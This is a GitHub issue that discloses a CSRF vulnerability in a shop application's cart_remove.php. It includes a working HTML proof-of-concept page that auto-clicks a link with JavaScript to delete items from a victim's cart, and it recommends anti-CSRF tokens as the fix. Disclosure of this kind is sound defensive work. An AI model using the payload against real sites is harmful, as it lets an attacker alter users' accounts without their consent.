Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CSRF vulnerability in cart_remove.php allows a remote attacker to remove any product in the customer's cart #2

Open
khanhchauminh opened this issue Oct 31, 2021 · 0 comments

Comments

@khanhchauminh
Copy link

khanhchauminh commented Oct 31, 2021

Author

KhanhCM (@khanhchauminh)

Version: 1.0

Details

The GET request for removing a product with id=1 looks like this:

http://127.0.0.1:8888/cart_remove.php?id=1

Changing the value of the id parameter in the customer session will remove the product with that ID.
A remote attacker can embed the request into an innocent-looking hyperlink:

<a href="http://127.0.0.1:8888/cart_remove.php?id=1">View</a>

Step to reproduce

  1. First, create a malicious HTML page then host a website containing that page.

PoC:

<html>
<head>
  <title>CSRF PoC</title>
</head>
<body>
  <p>CSRF PoC</p>
  <a id='link' href="http://127.0.0.1:8888/cart_remove.php?id=1">View</a>
  <script>
    document.getElementById('link').click();
  </script>
</body>
</html>
  1. Entice the customer to click on the link to the malicious site. When the customer browses to that site, the link would be automatically clicked via JavaScript and the product will be removed.

Response in Burpsuite

image
image

Source code review

cart_remove.php

image

Remediation

Implement an Anti-CSRF Token.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant